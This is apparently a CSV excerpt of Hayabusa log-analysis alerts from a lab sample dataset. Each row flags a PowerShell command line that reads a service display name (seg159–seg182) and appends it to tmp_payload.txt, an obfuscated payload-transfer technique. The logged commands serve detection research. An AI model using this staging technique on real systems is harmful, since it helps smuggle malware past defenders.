2021-11-03 17:38:18.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:20.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:20.064 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:21.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:21.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:22.968 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:22.984 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:24.421 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:24.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:25.872 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:25.884 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:27.322 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:27.338 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:28.794 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:28.794 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:30.297 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:30.297 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:31.756 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:31.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:33.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:33.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:34.682 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:34.682 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:36.122 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:36.138 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:37.638 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:37.638 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:39.090 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:39.090 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:40.532 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xadc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:40.547 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:41.996 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:41.996 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:43.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:43.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:44.878 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:44.893 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:46.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:46.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:47.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:47.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:49.273 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:49.273 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:50.726 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:50.742 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:52.180 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
